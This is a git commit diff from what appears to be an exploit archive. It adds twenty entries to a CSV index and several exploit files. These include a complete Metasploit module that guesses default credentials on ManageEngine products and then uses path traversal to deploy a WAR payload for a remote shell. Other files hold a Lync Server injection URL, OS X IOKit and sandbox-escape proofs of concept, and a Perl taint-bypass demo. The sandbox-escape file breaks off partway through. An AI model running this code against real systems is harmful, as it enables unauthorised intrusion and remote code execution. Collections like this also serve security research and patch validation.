Update: 2015-01-22
20 new exploits
This commit is contained in:
parent
66b6bb6da3
commit
cdb1e00bef
21 changed files with 1702 additions and 2 deletions
24
files.csv
24
files.csv
|
@ -27253,7 +27253,7 @@ id,file,description,date,author,platform,type,port
|
|||
30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability",2007-07-26,r0ut3r,php,dos,0
|
||||
30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x Login.ASP Cross-Site Scripting Vulnerability",2007-07-26,d3hydr8,asp,webapps,0
|
||||
30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0
|
||||
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,"Parvez Anwar",windows,remote,0
|
||||
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0
|
||||
30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0
|
||||
30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0
|
||||
30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0
|
||||
|
@ -27391,7 +27391,7 @@ id,file,description,date,author,platform,type,port
|
|||
30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
|
||||
30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
|
||||
30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0
|
||||
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,"Parvez Anwar",windows,remote,0
|
||||
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0
|
||||
30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability",2007-09-04,"Tushar Vartak",jsp,webapps,0
|
||||
30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection Vulnerability",2007-09-04,SmOk3,asp,webapps,0
|
||||
30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow Vulnerability",2007-09-04,miyy3t,windows,remote,0
|
||||
|
@ -32274,6 +32274,7 @@ id,file,description,date,author,platform,type,port
|
|||
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
|
||||
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
|
||||
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
|
||||
35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
|
||||
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
|
||||
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
|
||||
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
|
||||
|
@ -32283,3 +32284,22 @@ id,file,description,date,author,platform,type,port
|
|||
35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
|
||||
35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
|
||||
35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
|
||||
35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0
|
||||
35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass Vulnerability",2011-06-08,dst,linux,remote,0
|
||||
35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting Vulnerability",2011-06-07,LiquidWorm,php,webapps,0
|
||||
35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
|
||||
35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
|
||||
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
|
||||
35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
|
||||
35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
|
||||
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
|
||||
35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
|
||||
35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
|
||||
35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
|
||||
35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
|
||||
35850,platforms/windows/local/35850.bat,"Microsoft Windows XP 'tskill' Local Privilege Escalation Vulnerability",2011-06-13,"Todor Donev",windows,local,0
|
||||
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection Vulnerabilities",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0
|
||||
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/asp/webapps/35852.txt
Executable file
9
platforms/asp/webapps/35852.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/48235/info
|
||||
|
||||
Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
|
||||
|
||||
Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//
|
437
platforms/java/remote/35845.rb
Executable file
437
platforms/java/remote/35845.rb
Executable file
|
@ -0,0 +1,437 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
|
||||
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
|
||||
the upload does not handle correctly '../' sequences, which can be abused to write
|
||||
in the file system. Authentication is needed to exploit this vulnerability, but this module
|
||||
will attempt to login using the default credentials for the administrator and guest
|
||||
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
|
||||
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
|
||||
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
|
||||
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
|
||||
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
|
||||
been tested successfully in Windows and Linux on several versions.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-5301'],
|
||||
['OSVDB', '116733'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 30 },
|
||||
'Privileged' => false, # Privileged on Windows but not on Linux targets
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
|
||||
{
|
||||
'attachment_path' => '/workorder/Attachment.jsp'
|
||||
}
|
||||
],
|
||||
[ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
|
||||
{
|
||||
'attachment_path' => '/common/FileAttachment.jsp'
|
||||
}
|
||||
],
|
||||
[ 'IT360 v8-v10.4',
|
||||
{
|
||||
'attachment_path' => '/common/FileAttachment.jsp'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 15 2014'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('JSESSIONID',
|
||||
[false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
|
||||
OptString.new('IAMAGENTTICKET',
|
||||
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
|
||||
OptString.new('USERNAME',
|
||||
[true, 'The username to login as', 'guest']),
|
||||
OptString.new('PASSWORD',
|
||||
[true, 'Password for the specified username', 'guest']),
|
||||
OptString.new('DOMAIN_NAME',
|
||||
[false, 'Name of the domain to logon to'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def get_version
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
# Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
|
||||
version = [ 9999, 9999, 0, 'sd' ]
|
||||
|
||||
if res && res.code == 200
|
||||
if res.body.to_s =~ /ManageEngine ServiceDesk/
|
||||
if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
|
||||
output = $1
|
||||
version = [output[0].to_i, output[2].to_i, '0', 'sd']
|
||||
end
|
||||
if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
|
||||
version[2] = $1.to_i
|
||||
elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
|
||||
version[2] = $1.to_i
|
||||
end
|
||||
elsif res.body.to_s =~ /ManageEngine AssetExplorer/
|
||||
if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
|
||||
res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
|
||||
output = $1
|
||||
version = [output[0].to_i, output[2].to_i, 0, 'ae']
|
||||
end
|
||||
if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
|
||||
version[2] = $1.to_i
|
||||
end
|
||||
elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
|
||||
# All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
|
||||
version[3] = 'sc'
|
||||
if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
|
||||
# ... but get the build number if we can find it
|
||||
version[2] = $1.to_i
|
||||
end
|
||||
elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
|
||||
# IT360 newer versions
|
||||
version[3] = 'it'
|
||||
end
|
||||
elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
||||
# IT360 older versions, not a very good detection string but there is no alternative?
|
||||
version[3] = 'it'
|
||||
end
|
||||
|
||||
version
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
version = get_version
|
||||
# TODO: put fixed version on the two ifs below once (if...) products are fixed
|
||||
# sd was fixed on build 9031
|
||||
# ae and sc still not fixed
|
||||
if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
|
||||
(version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
|
||||
(version[3] == 'sc' && version[2] < 99999)
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
if (version[2] > 9030 && version[3] == 'sd') ||
|
||||
(version[2] > 99999 && version[3] == 'ae') ||
|
||||
(version[2] > 99999 && version[3] == 'sc')
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
# An IT360 check always lands here, there is no way to get the version easily
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def authenticate_it360(port, path, username, password)
|
||||
if datastore['DOMAIN_NAME'] == nil
|
||||
vars_post = {
|
||||
'LOGIN_ID' => username,
|
||||
'PASSWORD' => password,
|
||||
'isADEnabled' => 'false'
|
||||
}
|
||||
else
|
||||
vars_post = {
|
||||
'LOGIN_ID' => username,
|
||||
'PASSWORD' => password,
|
||||
'isADEnabled' => 'true',
|
||||
'domainName' => datastore['DOMAIN_NAME']
|
||||
}
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'rport' => port,
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(path),
|
||||
'vars_get' => {
|
||||
'service' => 'ServiceDesk',
|
||||
'furl' => '/',
|
||||
'timestamp' => Time.now.to_i
|
||||
},
|
||||
'vars_post' => vars_post
|
||||
})
|
||||
|
||||
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
|
||||
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
|
||||
return res.get_cookies
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def get_it360_cookie_name
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri("/")
|
||||
})
|
||||
cookie = res.get_cookies
|
||||
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
||||
return $1
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def login_it360
|
||||
# Do we already have a valid cookie? If yes, just return that.
|
||||
if datastore['IAMAGENTTICKET']
|
||||
cookie_name = get_it360_cookie_name
|
||||
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
|
||||
return cookie
|
||||
end
|
||||
|
||||
# get the correct path, host and port
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('/')
|
||||
})
|
||||
|
||||
if res && res.redirect?
|
||||
uri = [ res.redirection.port, res.redirection.path ]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
||||
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
|
||||
|
||||
if cookie != nil
|
||||
return cookie
|
||||
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
|
||||
# we've tried with the default guest password, now let's try with the default admin password
|
||||
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
|
||||
if cookie != nil
|
||||
return cookie
|
||||
else
|
||||
# Try one more time with the default admin login for some versions
|
||||
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
|
||||
if cookie != nil
|
||||
return cookie
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Authenticate and validate our session cookie. We need to submit credentials to
|
||||
# j_security_check and then follow the redirect to HomePage.do to create a valid
|
||||
# authenticated session.
|
||||
#
|
||||
def authenticate(cookie, username, password)
|
||||
res = send_request_cgi!({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => cookie,
|
||||
'vars_post' => {
|
||||
'j_username' => username,
|
||||
'j_password' => password,
|
||||
'logonDomainName' => datastore['DOMAIN_NAME']
|
||||
}
|
||||
})
|
||||
if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
|
||||
# sd and ae respond with 302 while sc responds with a 200
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def login
|
||||
# Do we already have a valid cookie? If yes, just return that.
|
||||
if datastore['JSESSIONID'] != nil
|
||||
cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
|
||||
return cookie
|
||||
end
|
||||
|
||||
# First we get a valid JSESSIONID to pass to authenticate()
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('/')
|
||||
})
|
||||
if res && res.code == 200
|
||||
cookie = res.get_cookies
|
||||
authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
|
||||
if authenticated
|
||||
return cookie
|
||||
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
|
||||
# we've tried with the default guest password, now let's try with the default admin password
|
||||
authenticated = authenticate(cookie, 'administrator', 'administrator')
|
||||
if authenticated
|
||||
return cookie
|
||||
else
|
||||
# Try one more time with the default admin login for some versions
|
||||
authenticated = authenticate(cookie, 'admin', 'admin')
|
||||
if authenticated
|
||||
return cookie
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
def send_multipart_request(cookie, payload_name, payload_str)
|
||||
if payload_name =~ /\.ear/
|
||||
upload_path = '../../server/default/deploy'
|
||||
else
|
||||
upload_path = rand_text_alpha(4+rand(4))
|
||||
end
|
||||
|
||||
post_data = Rex::MIME::Message.new
|
||||
|
||||
if @my_target == targets[1]
|
||||
# old style
|
||||
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
|
||||
post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
|
||||
post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
|
||||
post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
|
||||
post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
|
||||
post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
|
||||
post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
|
||||
post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
|
||||
else
|
||||
post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
|
||||
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
|
||||
post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
|
||||
end
|
||||
|
||||
data = post_data.to_s
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(@my_target['attachment_path']),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'cookie' => cookie
|
||||
})
|
||||
return res
|
||||
end
|
||||
|
||||
|
||||
def pick_target
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
version = get_version
|
||||
if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
|
||||
(version[0] == 4 && version[3] == 'ae') ||
|
||||
(version[3] == 'sc')
|
||||
# These are all "old style" versions (sc is always old style)
|
||||
return targets[1]
|
||||
elsif version[3] == 'it'
|
||||
return targets[3]
|
||||
else
|
||||
return targets[2]
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Selecting target...")
|
||||
@my_target = pick_target
|
||||
print_status("#{peer} - Selected target #{@my_target.name}")
|
||||
|
||||
if @my_target == targets[3]
|
||||
cookie = login_it360
|
||||
else
|
||||
cookie = login
|
||||
end
|
||||
|
||||
if cookie.nil?
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
|
||||
end
|
||||
|
||||
# First we generate the WAR with the payload...
|
||||
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
war_payload = payload.encoded_war({ :app_name => war_app_base })
|
||||
|
||||
# ... and then we create an EAR file that will contain it.
|
||||
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
|
||||
app_xml << '<application>'
|
||||
app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
|
||||
app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
|
||||
app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
|
||||
|
||||
# Zipping with CM_STORE to avoid errors while decompressing the zip
|
||||
# in the Java vulnerable application
|
||||
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
|
||||
ear_file.add_file(war_app_base + '.war', war_payload.to_s)
|
||||
ear_file.add_file('META-INF/application.xml', app_xml)
|
||||
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
|
||||
|
||||
if @my_target != targets[3]
|
||||
# Linux doesn't like it when we traverse non existing directories,
|
||||
# so let's create them by sending some random data before the EAR.
|
||||
# (IT360 does not have a Linux version so we skip the bogus file for it)
|
||||
print_status("#{peer} - Uploading bogus file...")
|
||||
res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
|
||||
if res && res.code != 200
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
|
||||
end
|
||||
end
|
||||
|
||||
# Now send the actual payload
|
||||
print_status("#{peer} - Uploading EAR file...")
|
||||
res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
|
||||
if res && res.code == 200
|
||||
print_status("#{peer} - Upload appears to have been successful")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
|
||||
end
|
||||
|
||||
10.times do
|
||||
select(nil, nil, nil, 2)
|
||||
|
||||
# Now make a request to trigger the newly deployed war
|
||||
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
|
||||
'method' => 'GET'
|
||||
})
|
||||
# Failure. The request timed out or the server went away.
|
||||
break if res.nil?
|
||||
# Success! Triggered the payload, should have a shell incoming
|
||||
break if res.code == 200
|
||||
end
|
||||
end
|
||||
end
|
27
platforms/linux/remote/35836.pl
Executable file
27
platforms/linux/remote/35836.pl
Executable file
|
@ -0,0 +1,27 @@
|
|||
source: http://www.securityfocus.com/bid/48167/info
|
||||
|
||||
The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
|
||||
|
||||
Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/opt/perl/5.12/bin/perl
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
|
||||
use Data::FormValidator;
|
||||
|
||||
"some_unrelated_string" =~ m/^.*$/;
|
||||
|
||||
my $profile = {
|
||||
untaint_all_constraints => 1,
|
||||
required => [qw(a)],
|
||||
constraint_methods => {
|
||||
a => qr/will_never_match/,
|
||||
},
|
||||
};
|
||||
|
||||
my $results = Data::FormValidator->check({ a => 1 }, $profile);
|
||||
warn $results->valid('a');
|
46
platforms/osx/dos/35849.c
Executable file
46
platforms/osx/dos/35849.c
Executable file
|
@ -0,0 +1,46 @@
|
|||
#include <fcntl.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <IOKit/IOKitLib.h>
|
||||
|
||||
int main(){
|
||||
kern_return_t err;
|
||||
|
||||
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
|
||||
if(!matching){
|
||||
printf("unable to create service matching dictionary\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
io_iterator_t iterator;
|
||||
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
|
||||
if (err != KERN_SUCCESS){
|
||||
printf("no matches\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
io_service_t service = IOIteratorNext(iterator);
|
||||
|
||||
if (service == IO_OBJECT_NULL){
|
||||
printf("unable to find service\n");
|
||||
return 0;
|
||||
}
|
||||
printf("got service: %x\n", service);
|
||||
|
||||
io_connect_t conn = MACH_PORT_NULL;
|
||||
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
|
||||
if (err != KERN_SUCCESS){
|
||||
printf("unable to get user client connection\n");
|
||||
return 0;
|
||||
}else{
|
||||
printf("got userclient connection: %x\n", conn);
|
||||
}
|
||||
|
||||
mach_vm_address_t addr = 0x414100000000;
|
||||
mach_vm_size_t size = 0x1000;
|
||||
|
||||
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
|
||||
return 0;
|
||||
}
|
185
platforms/osx/local/35847.c
Executable file
185
platforms/osx/local/35847.c
Executable file
|
@ -0,0 +1,185 @@
|
|||
// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
|
||||
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
|
||||
// ianbeer
|
||||
#include <dlfcn.h>
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
#include <xpc/xpc.h>
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
|
||||
#include <mach/mach.h>
|
||||
#include <mach/mach_vm.h>
|
||||
#include <mach/task.h>
|
||||
|
||||
#include <mach-o/dyld_images.h>
|
||||
|
||||
#include "liblorgnette/lorgnette.h"
|
||||
|
||||
/* find the base address of CoreFoundation for the ROP gadgets */
|
||||
|
||||
void* find_library_load_address(const char* library_name){
|
||||
kern_return_t err;
|
||||
|
||||
// get the list of all loaded modules from dyld
|
||||
// the task_info mach API will get the address of the dyld all_image_info struct for the given task
|
||||
// from which we can get the names and load addresses of all modules
|
||||
task_dyld_info_data_t task_dyld_info;
|
||||
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
|
||||
err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
|
||||
|
||||
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
|
||||
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
|
||||
|
||||
for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
|
||||
